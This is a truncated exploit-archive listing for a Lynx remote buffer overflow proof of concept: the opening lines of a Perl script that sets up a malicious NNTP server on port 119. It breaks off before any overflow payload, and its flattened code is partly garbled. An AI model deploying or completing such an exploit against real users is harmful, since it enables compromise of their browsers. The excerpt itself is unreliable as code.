Lynx <= 2.8.6dev.13 Remote Buffer Overflow Exploit (PoC)
No description provided by source. !/usr/bin/perl -- lynx-nntp-server by Ulf Harnhammar in 2005 I hereby place this program in the public domain. use strict; use IO::Socket; $main::port = 119; $main::timeout = 5; SUBROUTINES sub mysend$$ my $file = shift; my $str = shift; print $file $str\n; prin...